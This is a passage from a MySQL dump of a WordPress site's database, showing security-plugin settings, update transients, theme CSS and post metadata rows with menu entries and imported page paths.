website\";s:13:\"authonlyredir\";s:0:\"\";s:8:\"regwhite\";i:0;s:12:\"regwhite_msg\";s:0:\"\";s:12:\"reglimit_num\";i:3;s:12:\"reglimit_min\";i:60;s:6:\"emrule\";i:0;s:6:\"emlist\";a:0:{}s:10:\"prohibited\";a:0:{}s:7:\"app_pwd\";s:0:\"\";s:11:\"auth_expire\";s:0:\"\";s:8:\"usersort\";s:0:\"\";s:11:\"pdata_erase\";i:0;s:14:\"pdata_sessions\";i:0;s:12:\"pdata_export\";i:0;s:9:\"pdata_act\";i:0;s:9:\"pdata_trf\";a:0:{}}','no'),(158425,'cerber-antispam','a:10:{s:8:\"botscomm\";s:0:\"\";s:7:\"botsreg\";i:0;s:7:\"botsany\";i:0;s:8:\"botssafe\";i:0;s:10:\"botsnoauth\";s:0:\"\";s:10:\"customcomm\";i:0;s:9:\"botswhite\";s:0:\"\";s:8:\"spamcomm\";i:0;s:10:\"trashafter\";i:7;s:18:\"trashafter-enabled\";i:0;}','no'),(158426,'cerber-recaptcha','a:14:{s:7:\"sitekey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:9:\"invirecap\";i:0;s:10:\"recaplogin\";i:0;s:9:\"recaplost\";i:0;s:8:\"recapreg\";i:0;s:13:\"recapwoologin\";i:0;s:12:\"recapwoolost\";i:0;s:11:\"recapwooreg\";i:0;s:8:\"recapcom\";i:0;s:12:\"recapcomauth\";i:0;s:16:\"recaptcha-period\";i:60;s:16:\"recaptcha-number\";i:3;s:16:\"recaptcha-within\";i:30;}','no'),(158427,'cerber-notifications','a:11:{s:6:\"notify\";s:0:\"\";s:5:\"above\";i:3;s:5:\"email\";s:0:\"\";s:9:\"emailrate\";i:12;s:14:\"notify-new-ver\";s:1:\"1\";s:7:\"pbtoken\";s:0:\"\";s:8:\"pbdevice\";s:0:\"\";s:12:\"wreports-day\";s:1:\"1\";s:13:\"wreports-time\";i:9;s:12:\"email-report\";s:0:\"\";s:13:\"enable-report\";s:1:\"1\";}','no'),(158428,'cerber-traffic','a:22:{s:9:\"tienabled\";s:1:\"1\";s:9:\"tiipwhite\";i:0;s:7:\"tiwhite\";s:0:\"\";s:8:\"tierrmon\";s:1:\"1\";s:11:\"tierrnoauth\";s:0:\"\";s:6:\"timode\";s:1:\"3\";s:12:\"tilogrestapi\";i:0;s:11:\"tilogxmlrpc\";i:0;s:9:\"tinocrabs\";s:1:\"1\";s:8:\"tinolocs\";a:0:{}s:6:\"tinoua\";a:0:{}s:8:\"tifields\";i:0;s:6:\"timask\";s:0:\"\";s:6:\"tihdrs\";i:0;s:11:\"tihdrs_sent\";i:0;s:6:\"tisenv\";i:0;s:7:\"ticandy\";i:0;s:12:\"ticandy_sent\";i:0;s:8:\"tiphperr\";i:0;s:11:\"tithreshold\";s:0:\"\";s:9:\"tikeeprec\";i:30;s:14:\"tikeeprec_auth\";i:30;}','no'),(158429,'cerber-user_shield','a:9:{s:7:\"ds_4acc\";i:0;s:13:\"ds_regs_roles\";a:0:{}s:10:\"ds_add_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_edit_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_4acc_acl\";i:0;s:9:\"ds_4roles\";i:0;s:11:\"ds_add_role\";a:1:{i:0;s:13:\"administrator\";}s:12:\"ds_edit_role\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4roles_acl\";i:0;}','no'),(158430,'cerber-opt_shield','a:4:{s:8:\"ds_4opts\";i:0;s:14:\"ds_4opts_roles\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4opts_list\";a:7:{s:11:\"admin_email\";i:1;s:12:\"default_role\";i:1;s:4:\"home\";i:1;s:7:\"siteurl\";i:1;s:18:\"users_can_register\";i:1;s:14:\"active_plugins\";i:1;s:8:\"template\";i:1;}s:12:\"ds_4opts_acl\";i:0;}','no'),(158431,'cerber-scanner','a:10:{s:8:\"scan_cpt\";a:0:{}s:9:\"scan_uext\";a:0:{}s:12:\"scan_exclude\";a:0:{}s:9:\"scan_inew\";s:1:\"1\";s:9:\"scan_imod\";s:1:\"1\";s:10:\"scan_chmod\";i:0;s:8:\"scan_tmp\";i:0;s:9:\"scan_sess\";i:0;s:10:\"scan_debug\";i:0;s:13:\"scan_qcleanup\";s:2:\"30\";}','no'),(158432,'cerber-schedule','a:8:{s:11:\"scan_aquick\";i:0;s:10:\"scan_afull\";s:5:\"05:00\";s:18:\"scan_afull-enabled\";i:0;s:10:\"scan_reinc\";a:5:{i:3;i:1;i:4;i:1;i:15;i:1;i:50;i:1;i:51;i:1;}s:12:\"scan_relimit\";i:3;s:10:\"scan_isize\";i:0;s:12:\"scan_ierrors\";i:0;s:10:\"email-scan\";s:0:\"\";}','no'),(158433,'cerber-policies','a:9:{s:13:\"scan_delunatt\";i:0;s:11:\"scan_delupl\";a:0:{}s:14:\"scan_delunwant\";i:0;s:15:\"scan_recover_wp\";i:0;s:15:\"scan_recover_pl\";i:0;s:14:\"scan_nodeltemp\";i:0;s:14:\"scan_nodelsess\";i:0;s:13:\"scan_delexdir\";a:0:{}s:13:\"scan_delexext\";a:0:{}}','no'),(158434,'cerber-nexus_master','a:7:{s:13:\"master_tolist\";s:0:\"\";s:13:\"master_swshow\";s:0:\"\";s:14:\"master_at_site\";s:0:\"\";s:13:\"master_locale\";i:0;s:9:\"master_dt\";i:0;s:9:\"master_tz\";i:0;s:11:\"master_diag\";i:0;}','no'),(158435,'cerber-nexus-slave','a:3:{s:9:\"slave_ips\";s:0:\"\";s:12:\"slave_access\";i:2;s:10:\"slave_diag\";i:0;}','no'),(158436,'_cerber_up','a:2:{s:1:\"v\";s:5:\"8.8.5\";s:1:\"t\";i:1624621051;}','no'),(158437,'cerber_admin_info','<h1>Highlights from WP Cerber Security 8.8.5</h1><ul><li>New: Quick user activity analytics (user insights) with filtering links on the Activity and Live Traffic log pages. Select a user to see how it works.</li><li>New: Quick IP address activity and analytics (IP insights) with filtering links on the Activity and Live Traffic log pages. Select an IP address to see how it works.</li><li>Improved: The selected user profile is displayed when filtering log entries by the user login or using the username search on the Activity log page.</li><li>Improved: The IP address details and analytics are displayed when filtering log entries by the IP address or using the IP address search on the Activity log page.</li><li>Improved: Implemented AJAX rendering of the plugin admin pages for faster loading and more convenient navigation through WP Cerber’s admin pages</li><li>Improved: To load the Users admin page faster, the user table columns generated by WP Cerber are now loaded via AJAX.</li><li>Improved: Highlighting the selected filtering link in the navigation bar on the Activity and Live Traffic log pages.</li></ul><p style=\"margin-top: 18px; line-height: 1.3;\"><span class=\"dashicons-before dashicons-info-outline\"></span>  &nbsp; <a href=\"https://wpcerber.com/?plugin_version=8.8.5\" target=\"_blank\">Read more on wpcerber.com</a></p>  <h2 style=\"margin-top: 28px;\">We need your support to keep moving forward</h2>\r\n                    <table style=\"margin-top: 20px;\"><tr><td></td><td style=\"padding-top: 0;\">By sharing your unique opinion on WP Cerber, you help the engineers behind the plugin make greater progress and help other professionals find the right software. You can leave your review on one of the following websites. Feel free to use your native language. Thanks!\r\n                    </td></tr></table>\r\n                       \r\n                    <p><a href=\"https://www.trustpilot.com/evaluate/wpcerber.com\" target=\"_blank\">Leave review on Trustpilot</a>\r\n                    &nbsp;|&nbsp; \r\n                    <a href=\"https://www.g2.com/products/cerber-security-antispam-malware-scan/reviews/start\" target=\"_blank\">Leave review on G2.COM</a><p style=\"text-align:right; padding-right: 20px;\">\r\n    		    <input type=\"button\" class=\"button button-primary cerber-dismiss\" value=\" &nbsp; Awesome! &nbsp; \"/></p>','no'),(158446,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(158454,'recovery_keys','a:0:{}','yes'),(158455,'https_detection_errors','a:0:{}','yes'),(158497,'wordfence_syncAttackDataAttempts','0','no'),(158498,'wordfence_syncingAttackData','0','no'),(158499,'wordfence_lastSyncAttackData','1631609757','no'),(158509,'finished_updating_comment_type','1','yes'),(158579,'_transient_health-check-site-status-result','{\"good\":12,\"recommended\":6,\"critical\":1}','yes'),(161653,'wp_page_for_privacy_policy','0','yes'),(161654,'show_comments_cookies_opt_in','1','yes'),(161655,'admin_email_lifespan','1649932987','yes'),(161656,'disallowed_keys','','no'),(161657,'comment_previously_approved','','yes'),(161658,'auto_plugin_theme_update_emails','a:0:{}','no'),(161659,'auto_update_core_dev','enabled','yes'),(161660,'auto_update_core_minor','enabled','yes'),(161661,'auto_update_core_major','unset','yes'),(161662,'db_upgraded','','yes'),(182749,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(197795,'wp_force_deactivated_plugins','a:0:{}','yes'),(197815,'can_compress_scripts','0','no'),(240270,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1675167562;s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:0:{}s:7:\"checked\";a:1:{s:23:\"wp-cerber/wp-cerber.php\";s:5:\"8.9.6\";}}','no'),(261314,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:4:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.1.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-6.1-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-6.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:3:\"6.1\";s:7:\"version\";s:3:\"6.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.0.3-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.0.3-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.0.3\";s:7:\"version\";s:5:\"6.0.3\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1675167561;s:15:\"version_checked\";s:5:\"5.9.5\";s:12:\"translations\";a:0:{}}','no'),(283414,'_site_transient_timeout_php_check_990bfacb848fa087bcfc06850f5e4447','1675240816','no'),(283415,'_site_transient_php_check_990bfacb848fa087bcfc06850f5e4447','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(285687,'_site_transient_timeout_theme_roots','1675169362','no'),(285688,'_site_transient_theme_roots','a:3:{s:9:\"sg-window\";s:7:\"/themes\";s:12:\"shootingstar\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";}','no'),(285689,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1675167562;s:7:\"checked\";a:3:{s:9:\"sg-window\";s:5:\"1.2.1\";s:12:\"shootingstar\";s:5:\"2.1.6\";s:15:\"twentytwentytwo\";s:3:\"1.1\";}s:8:\"response\";a:2:{s:9:\"sg-window\";a:6:{s:5:\"theme\";s:9:\"sg-window\";s:11:\"new_version\";s:5:\"1.2.3\";s:3:\"url\";s:39:\"https://wordpress.org/themes/sg-window/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/sg-window.1.2.3.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"1.3\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.1.3.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:1:{s:12:\"shootingstar\";a:6:{s:5:\"theme\";s:12:\"shootingstar\";s:11:\"new_version\";s:5:\"2.1.6\";s:3:\"url\";s:42:\"https://wordpress.org/themes/shootingstar/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/shootingstar.2.1.6.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}}s:12:\"translations\";a:0:{}}','no'),(285798,'_transient_timeout_global_styles_shootingstar','1675209386','no'),(285799,'_transient_global_styles_shootingstar','body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url(\'#wp-duotone-dark-grayscale\');--wp--preset--duotone--grayscale: url(\'#wp-duotone-grayscale\');--wp--preset--duotone--purple-yellow: url(\'#wp-duotone-purple-yellow\');--wp--preset--duotone--blue-red: url(\'#wp-duotone-blue-red\');--wp--preset--duotone--midnight: url(\'#wp-duotone-midnight\');--wp--preset--duotone--magenta-yellow: url(\'#wp-duotone-magenta-yellow\');--wp--preset--duotone--purple-green: url(\'#wp-duotone-purple-green\');--wp--preset--duotone--blue-orange: url(\'#wp-duotone-blue-orange\');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}','no');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=1279 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (11,6,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(12,6,'_edit_last','1'),(13,6,'_edit_lock','1503404350:1'),(14,6,'_adinserter_block_exceptions',''),(15,6,'_wpb_vc_js_status','false'),(16,8,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(17,8,'_edit_last','1'),(18,8,'_adinserter_block_exceptions',''),(19,8,'_wpb_vc_js_status','false'),(20,8,'_edit_lock','1503404577:1'),(21,10,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(22,10,'_edit_last','1'),(23,10,'_adinserter_block_exceptions',''),(24,10,'_wpb_vc_js_status','false'),(25,10,'_edit_lock','1503404595:1'),(26,12,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27,12,'_edit_last','1'),(28,12,'_adinserter_block_exceptions',''),(29,12,'_wpb_vc_js_status','false'),(30,12,'_edit_lock','1503404478:1'),(31,14,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32,14,'_edit_last','1'),(33,14,'_adinserter_block_exceptions',''),(34,14,'_wpb_vc_js_status','false'),(35,14,'_edit_lock','1503404642:1'),(36,16,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(37,16,'_edit_last','1'),(38,16,'_adinserter_block_exceptions',''),(39,16,'_wpb_vc_js_status','false'),(40,16,'_edit_lock','1503404660:1'),(41,18,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42,18,'_menu_item_type','custom'),(43,18,'_menu_item_menu_item_parent','0'),(44,18,'_menu_item_object_id','18'),(45,18,'_menu_item_object','custom'),(46,18,'_menu_item_target',''),(47,18,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(48,18,'_menu_item_xfn',''),(49,18,'_menu_item_url','http://www.bournesociety.org.uk/'),(51,19,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52,19,'_menu_item_type','post_type'),(53,19,'_menu_item_menu_item_parent','0'),(54,19,'_menu_item_object_id','14'),(55,19,'_menu_item_object','page'),(56,19,'_menu_item_target',''),(57,19,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58,19,'_menu_item_xfn',''),(59,19,'_menu_item_url',''),(61,20,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(62,20,'_menu_item_type','post_type'),(63,20,'_menu_item_menu_item_parent','0'),(64,20,'_menu_item_object_id','12'),(65,20,'_menu_item_object','page'),(66,20,'_menu_item_target',''),(67,20,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(68,20,'_menu_item_xfn',''),(69,20,'_menu_item_url',''),(71,21,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(72,21,'_menu_item_type','post_type'),(73,21,'_menu_item_menu_item_parent','0'),(74,21,'_menu_item_object_id','10'),(75,21,'_menu_item_object','page'),(76,21,'_menu_item_target',''),(77,21,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(78,21,'_menu_item_xfn',''),(79,21,'_menu_item_url',''),(81,22,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(82,22,'_menu_item_type','post_type'),(83,22,'_menu_item_menu_item_parent','0'),(84,22,'_menu_item_object_id','16'),(85,22,'_menu_item_object','page'),(86,22,'_menu_item_target',''),(87,22,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(88,22,'_menu_item_xfn',''),(89,22,'_menu_item_url',''),(91,23,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(92,23,'_menu_item_type','post_type'),(93,23,'_menu_item_menu_item_parent','0'),(94,23,'_menu_item_object_id','6'),(95,23,'_menu_item_object','page'),(96,23,'_menu_item_target',''),(97,23,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(98,23,'_menu_item_xfn',''),(99,23,'_menu_item_url',''),(101,24,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(102,24,'_menu_item_type','post_type'),(103,24,'_menu_item_menu_item_parent','0'),(104,24,'_menu_item_object_id','8'),(105,24,'_menu_item_object','page'),(106,24,'_menu_item_target',''),(107,24,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(108,24,'_menu_item_xfn',''),(109,24,'_menu_item_url',''),(114,27,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(115,27,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/10-tips-to-get-your-partner-to-be-attracted-to-you-again.html'),(116,28,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(117,28,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/3-common-signs-your-partner-may-be-cheating-on-you.html'),(118,29,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(119,29,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/3-keys-to-transform-your-marriage.html'),(120,30,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(121,30,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/3-marriage-problems-that-can-cause-a-marriage-to-go-bad.html'),(122,31,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(123,31,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/5-easy-golden-keys-to-a-happy-spouse.html'),(124,32,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(125,32,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/5-marriage-tips-for-a-better-marriage.html'),(128,34,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(129,34,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/5-things-to-do-before-you-even-think-about-getting-a-divorce.html'),(130,35,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(131,35,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/69-very-big-divorce-mistakes-you-do-not-have-to-make.html'),(132,36,'_vc_post_settings','a:1:{